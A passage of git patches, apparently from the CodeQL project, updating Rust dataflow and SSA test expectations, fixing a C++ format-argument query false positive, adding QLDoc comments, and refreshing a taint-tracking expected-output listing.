+ sink(n2); // $ hasValueFlow=20 let arr3 = [1, 2, 3]; let n3 = arr3[2]; @@ -327,7 +327,7 @@ fn array_lookup() { fn array_for_loop() { let arr1 = [1, 2, source(43)]; for n1 in arr1 { - sink(n1); // $ MISSING: hasValueFlow=43 + sink(n1); // $ hasValueFlow=43 } let arr2 = [1, 2, 3]; @@ -340,9 +340,9 @@ fn array_slice_pattern() { let arr1 = [1, 2, source(43)]; match arr1 { [a, b, c] => { - sink(a); - sink(b); - sink(c); // $ MISSING: hasValueFlow=43 + sink(a); // $ SPURIOUS: hasValueFlow=43 + sink(b); // $ SPURIOUS: hasValueFlow=43 + sink(c); // $ hasValueFlow=43 } } } @@ -353,8 +353,8 @@ fn array_assignment() { mut_arr[1] = source(55); let d = mut_arr[1]; - sink(d); // $ MISSING: hasValueFlow=55 - sink(mut_arr[0]); + sink(d); // $ hasValueFlow=55 + sink(mut_arr[0]); // $ SPURIOUS: hasValueFlow=55 } fn main() { diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index 2898dac871e..18fc0cffc35 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected @@ -137,7 +137,6 @@ definition | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | | variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | | variables.rs:514:9:514:9 | z | variables.rs:514:9:514:9 | z | @@ -266,7 +265,8 @@ read | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:503:5:503:5 | a | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | | variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | | variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | @@ -371,7 +371,6 @@ firstRead | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | | variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | | variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | @@ -476,8 +475,7 @@ lastRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | | variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | | variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | @@ -508,6 +506,8 @@ adjacentReads | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:464:19:464:19 | x | variables.rs:472:19:472:19 | x | | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | variables.rs:470:19:470:19 | x | | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | variables.rs:472:19:472:19 | x | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | variables.rs:503:5:503:5 | a | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:503:5:503:5 | a | variables.rs:504:15:504:15 | a | phi | variables.rs:191:9:191:44 | [match(true)] phi | variables.rs:191:9:191:44 | a3 | variables.rs:191:22:191:23 | a3 | | variables.rs:191:9:191:44 | [match(true)] phi | variables.rs:191:9:191:44 | a3 | variables.rs:191:42:191:43 | a3 | diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index 7d83ec1fbc5..141114e2700 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected @@ -1,6 +1,4 @@ testFailures -| variables.rs:503:5:503:5 | a | Unexpected result: write_access=a | -| variables.rs:503:15:503:32 | //... | Missing result: read_access=a | failures variable | variables.rs:3:14:3:14 | s | @@ -281,7 +279,6 @@ variableWriteAccess | variables.rs:450:9:450:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:454:9:454:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variableReadAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | @@ -419,6 +416,7 @@ variableReadAccess | variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | | variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | | variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | From 08859be07bfcf2e297b7baeee5ca216c097e79e2 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Tue, 3 Dec 2024 16:33:40 +0000 Subject: [PATCH 0779/1267] C++: Test case for cpp/wrong-number-format-arguments --- .../WrongNumberOfFormatArguments.expected | 1 + .../Format/WrongNumberOfFormatArguments/syntax_errors.c | 6 +++++- 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected index d99190ef1eb..c4a9e8d3c6c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected @@ -5,6 +5,7 @@ | macros.cpp:14:2:14:37 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:21:2:21:36 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:32:2:32:25 | call to printf | Format for printf (in a macro expansion) expects 1 arguments but given 0 | +| syntax_errors.c:8:5:8:10 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:9:2:9:7 | call to printf | Format for printf expects 1 arguments but given 0 | | test.c:12:2:12:7 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:15:2:15:7 | call to printf | Format for printf expects 3 arguments but given 2 | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c index 8dfa8b9418c..c9f7ab4dc4b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c @@ -3,5 +3,9 @@ extern int printf(const char *fmt, ...); void test_syntax_error() { - printf("Error code %d: " FMT_MSG, 0, ""); + printf("Error code %d: " UNDEFINED_MACRO, 0, ""); + + printf("%d%d", + (UNDEFINED_MACRO)1, + (UNDEFINED_MACRO)2); } From 99efff22174ae3614f44dc12612daf71a448d042 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Tue, 3 Dec 2024 16:40:02 +0000 Subject: [PATCH 0780/1267] C++: Fix a FP in cpp/wrong-number-format-arguments caused by extraction error --- cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql | 3 ++- .../WrongNumberOfFormatArguments.expected | 1 - 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql b/cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql index 1dd1668a880..38ca69361cd 100644 --- a/cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql +++ b/cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql @@ -44,7 +44,8 @@ where ) and // A typical problem is that string literals are concatenated, but if one of the string // literals is an undefined macro, then this just leads to a syntax error. - not exists(SyntaxError e | e.affects(fl)) + not exists(SyntaxError e | e.affects(fl)) and + not ffc.getArgument(_) instanceof ErrorExpr select ffc, "Format for " + ffcName + " expects " + expected.toString() + " arguments but given " + given.toString() diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected index c4a9e8d3c6c..d99190ef1eb 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected @@ -5,7 +5,6 @@ | macros.cpp:14:2:14:37 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:21:2:21:36 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:32:2:32:25 | call to printf | Format for printf (in a macro expansion) expects 1 arguments but given 0 | -| syntax_errors.c:8:5:8:10 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:9:2:9:7 | call to printf | Format for printf expects 1 arguments but given 0 | | test.c:12:2:12:7 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:15:2:15:7 | call to printf | Format for printf expects 3 arguments but given 2 | From 2c58279137a2f3da9b3c71e18d7966e2b9c60ad2 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 17:52:29 +0000 Subject: [PATCH 0781/1267] C++: Add QLDoc to 'isClassConstructedFrom' and 'isFunctionConstructedFrom'. --- .../semmle/code/cpp/dataflow/ExternalFlow.qll | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll index 9496bfe98ba..d234dbc8e3a 100644 --- a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll +++ b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll @@ -434,12 +434,30 @@ private predicate elementSpec( summaryModel(namespace, type, subtypes, name, signature, ext, _, _, _, _, _) } +/** + * Holds if `c` is an instantiation of a class template `templateClass`, or + * holds with `c = templateClass` if `c` is not an instantiation of any class + * template. + * + * This predicate is used instead of `Class.isConstructedFrom` (which only + * holds for template instantiations) in this file to allow for uniform + * treatment of non-templated classes and class template instantiations. + */ private predicate isClassConstructedFrom(Class c, Class templateClass) { c.isConstructedFrom(templateClass) or not c.isConstructedFrom(_) and c = templateClass } +/** + * Holds if `f` is an instantiation of a function template `templateFunc`, or + * holds with `f = templateFunc` if `f` is not an instantiation of any function + * template. + * + * This predicate is used instead of `Function.isConstructedFrom` (which only + * holds for template instantiations) in this file to allow for uniform + * treatment of non-templated classes and class template instantiations. + */ private predicate isFunctionConstructedFrom(Function f, Function templateFunc) { f.isConstructedFrom(templateFunc) or From 0c8245f727e8fc7fac2b5731dcbc5e4d7bd86fdc Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 17:53:01 +0000 Subject: [PATCH 0782/1267] Update cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp Co-authored-by: Geoffrey White <40627776+geoffw0@users.noreply.github.com> --- cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index de3df30b283..d8f5da01633 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -25,7 +25,8 @@ typedef wchar_t* LPWSTR, *PWSTR; typedef BSTR* LPBSTR; typedef unsigned short USHORT; typedef char *LPTSTR; -struct __POSITION { int unused; };typedef __POSITION* POSITION; +struct __POSITION { int unused; }; +typedef __POSITION* POSITION; typedef WORD ATL_URL_PORT; enum ATL_URL_SCHEME{ From 593e2233f827f63161c664be9c54ec556c59ddde Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 17:55:59 +0000 Subject: [PATCH 0783/1267] C++: Update test changes after 0c8245f727e8fc7fac2b5731dcbc5e4d7bd86fdc. --- .../dataflow/taint-tests/localTaint.expected | 1608 ++++++++--------- .../taint-tests/test_mad-signatures.expected | 400 ++-- 2 files changed, 1004 insertions(+), 1004 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 3f77cb77b9c..c8a2ee98665 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -140,820 +140,820 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | arrayassignment.cpp:145:12:145:12 | 5 | arrayassignment.cpp:145:7:145:13 | access to array | TAINT | | arrayassignment.cpp:146:7:146:10 | arr3 | arrayassignment.cpp:146:7:146:13 | access to array | | | arrayassignment.cpp:146:12:146:12 | 5 | arrayassignment.cpp:146:7:146:13 | access to array | TAINT | -| atl.cpp:32:30:32:30 | 1 | atl.cpp:32:29:32:30 | - ... | TAINT | -| atl.cpp:76:14:76:25 | call to source | atl.cpp:77:21:77:21 | x | | -| atl.cpp:77:21:77:21 | x | atl.cpp:77:21:77:22 | call to _U_STRINGorID | TAINT | -| atl.cpp:77:21:77:22 | call to _U_STRINGorID | atl.cpp:78:10:78:10 | u | | -| atl.cpp:82:17:82:43 | call to indirect_source | atl.cpp:83:21:83:21 | y | | -| atl.cpp:83:21:83:21 | y | atl.cpp:83:21:83:22 | call to _U_STRINGorID | TAINT | -| atl.cpp:83:21:83:22 | call to _U_STRINGorID | atl.cpp:84:10:84:10 | u | | -| atl.cpp:103:15:103:35 | call to indirect_source | atl.cpp:104:19:104:19 | x | | -| atl.cpp:104:19:104:19 | x | atl.cpp:104:19:104:20 | call to CA2AEX | TAINT | -| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:105:29:105:29 | a | | -| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:106:10:106:10 | a | | -| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:107:10:107:10 | a | | -| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:108:3:108:3 | a | | -| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:106:10:106:10 | a | | -| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:107:10:107:10 | a | | -| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:108:3:108:3 | a | | -| atl.cpp:106:10:106:10 | a [post update] | atl.cpp:107:10:107:10 | a | | -| atl.cpp:106:10:106:10 | a [post update] | atl.cpp:108:3:108:3 | a | | -| atl.cpp:107:10:107:10 | a [post update] | atl.cpp:108:3:108:3 | a | | -| atl.cpp:111:15:111:35 | call to indirect_source | atl.cpp:112:19:112:19 | x | | -| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:113:29:113:29 | a | | -| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:114:10:114:10 | a | | -| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:115:10:115:10 | a | | -| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:116:3:116:3 | a | | -| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:114:10:114:10 | a | | -| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:115:10:115:10 | a | | -| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:116:3:116:3 | a | | -| atl.cpp:114:10:114:10 | a [post update] | atl.cpp:115:10:115:10 | a | | -| atl.cpp:114:10:114:10 | a [post update] | atl.cpp:116:3:116:3 | a | | -| atl.cpp:115:10:115:10 | a [post update] | atl.cpp:116:3:116:3 | a | | -| atl.cpp:129:14:129:34 | call to indirect_source | atl.cpp:131:20:131:20 | x | | -| atl.cpp:129:14:129:34 | call to indirect_source | atl.cpp:137:20:137:20 | x | | -| atl.cpp:131:20:131:20 | x | atl.cpp:131:20:131:21 | call to CA2CAEX | TAINT | -| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:132:30:132:30 | a | | -| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:133:10:133:10 | a | | -| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:134:10:134:10 | a | | -| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:135:3:135:3 | a | | -| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:138:30:138:30 | a | | -| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:139:10:139:10 | a | | -| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:140:10:140:10 | a | | -| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:141:3:141:3 | a | | -| atl.cpp:155:14:155:34 | call to indirect_source | atl.cpp:157:19:157:19 | x | | -| atl.cpp:155:14:155:34 | call to indirect_source | atl.cpp:163:19:163:19 | x | | -| atl.cpp:157:19:157:19 | x | atl.cpp:157:19:157:20 | call to CA2WEX | TAINT | -| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:158:30:158:30 | a | | -| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:159:10:159:10 | a | | -| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:160:10:160:10 | a | | -| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:161:3:161:3 | a | | -| atl.cpp:158:30:158:30 | ref arg a | atl.cpp:159:10:159:10 | a | | -| atl.cpp:158:30:158:30 | ref arg a | atl.cpp:160:10:160:10 | a | | -| atl.cpp:158:30:158:30 | ref arg a | atl.cpp:161:3:161:3 | a | | -| atl.cpp:159:10:159:10 | a [post update] | atl.cpp:160:10:160:10 | a | | -| atl.cpp:159:10:159:10 | a [post update] | atl.cpp:161:3:161:3 | a | | -| atl.cpp:159:12:159:16 | ref arg m_psz | atl.cpp:160:12:160:16 | m_psz | | -| atl.cpp:160:10:160:10 | a [post update] | atl.cpp:161:3:161:3 | a | | -| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:164:30:164:30 | a | | -| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:165:10:165:10 | a | | -| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:166:10:166:10 | a | | -| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:167:3:167:3 | a | | -| atl.cpp:164:30:164:30 | ref arg a | atl.cpp:165:10:165:10 | a | | -| atl.cpp:164:30:164:30 | ref arg a | atl.cpp:166:10:166:10 | a | | -| atl.cpp:164:30:164:30 | ref arg a | atl.cpp:167:3:167:3 | a | | -| atl.cpp:165:10:165:10 | a [post update] | atl.cpp:166:10:166:10 | a | | -| atl.cpp:165:10:165:10 | a [post update] | atl.cpp:167:3:167:3 | a | | -| atl.cpp:165:12:165:16 | ref arg m_psz | atl.cpp:166:12:166:16 | m_psz | | -| atl.cpp:166:10:166:10 | a [post update] | atl.cpp:167:3:167:3 | a | | -| atl.cpp:215:11:215:21 | call to source | atl.cpp:219:11:219:11 | x | | -| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:219:5:219:5 | a | | -| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:220:10:220:10 | a | | -| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:221:5:221:5 | a | | -| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:222:10:222:10 | a | | -| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:226:15:226:15 | a | | -| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:241:3:241:3 | a | | -| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:220:10:220:10 | a | | -| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:221:5:221:5 | a | | -| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:222:10:222:10 | a | | -| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:226:15:226:15 | a | | -| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:241:3:241:3 | a | | -| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:221:5:221:5 | a | | -| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:222:10:222:10 | a | | -| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:226:15:226:15 | a | | -| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:241:3:241:3 | a | | -| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:222:10:222:10 | a | | -| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:226:15:226:15 | a | | -| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:241:3:241:3 | a | | -| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:226:15:226:15 | a | | -| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:241:3:241:3 | a | | -| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:225:10:225:11 | a2 | | -| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:226:5:226:6 | a2 | | -| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:227:10:227:11 | a2 | | -| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:231:13:231:14 | a2 | | -| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:241:3:241:3 | a2 | | -| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:226:5:226:6 | a2 | | -| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:227:10:227:11 | a2 | | -| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:231:13:231:14 | a2 | | -| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:241:3:241:3 | a2 | | -| atl.cpp:226:5:226:6 | ref arg a2 | atl.cpp:227:10:227:11 | a2 | | -| atl.cpp:226:5:226:6 | ref arg a2 | atl.cpp:231:13:231:14 | a2 | | -| atl.cpp:226:5:226:6 | ref arg a2 | atl.cpp:241:3:241:3 | a2 | | -| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:231:13:231:14 | a2 | | -| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:241:3:241:3 | a2 | | -| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:230:10:230:11 | a3 | | -| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:231:5:231:6 | a3 | | -| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:232:10:232:11 | a3 | | -| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:234:10:234:11 | a3 | | -| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:235:11:235:12 | a3 | | -| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:239:26:239:27 | a3 | | -| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:241:3:241:3 | a3 | | -| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:231:5:231:6 | a3 | | -| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:232:10:232:11 | a3 | | -| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | -| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | -| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | -| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | -| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:232:10:232:11 | a3 | | -| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | -| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | -| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | -| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | -| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | -| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | -| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | -| atl.cpp:235:11:235:12 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | -| atl.cpp:235:11:235:12 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | -| atl.cpp:235:14:235:20 | call to GetData | atl.cpp:235:10:235:22 | * ... | TAINT | -| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:238:10:238:11 | a4 | | -| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:239:5:239:6 | a4 | | -| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:240:10:240:11 | a4 | | -| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:241:3:241:3 | a4 | | -| atl.cpp:238:10:238:11 | ref arg a4 | atl.cpp:239:5:239:6 | a4 | | -| atl.cpp:238:10:238:11 | ref arg a4 | atl.cpp:240:10:240:11 | a4 | | -| atl.cpp:238:10:238:11 | ref arg a4 | atl.cpp:241:3:241:3 | a4 | | -| atl.cpp:239:5:239:6 | ref arg a4 | atl.cpp:240:10:240:11 | a4 | | -| atl.cpp:239:5:239:6 | ref arg a4 | atl.cpp:241:3:241:3 | a4 | | -| atl.cpp:239:26:239:27 | a3 | atl.cpp:239:25:239:27 | & ... | | -| atl.cpp:240:10:240:11 | ref arg a4 | atl.cpp:241:3:241:3 | a4 | | -| atl.cpp:243:20:243:21 | call to CAtlArray | atl.cpp:244:5:244:6 | a5 | | -| atl.cpp:243:20:243:21 | call to CAtlArray | atl.cpp:245:10:245:11 | a5 | | -| atl.cpp:243:20:243:21 | call to CAtlArray | atl.cpp:250:3:250:3 | a5 | | -| atl.cpp:244:5:244:6 | ref arg a5 | atl.cpp:245:10:245:11 | a5 | | -| atl.cpp:244:5:244:6 | ref arg a5 | atl.cpp:250:3:250:3 | a5 | | -| atl.cpp:245:10:245:11 | ref arg a5 | atl.cpp:250:3:250:3 | a5 | | -| atl.cpp:247:20:247:21 | call to CAtlArray | atl.cpp:248:5:248:6 | a6 | | -| atl.cpp:247:20:247:21 | call to CAtlArray | atl.cpp:249:10:249:11 | a6 | | -| atl.cpp:247:20:247:21 | call to CAtlArray | atl.cpp:250:3:250:3 | a6 | | -| atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:249:10:249:11 | a6 | | -| atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | -| atl.cpp:249:10:249:11 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:299:18:299:18 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:307:19:307:19 | x | | -| 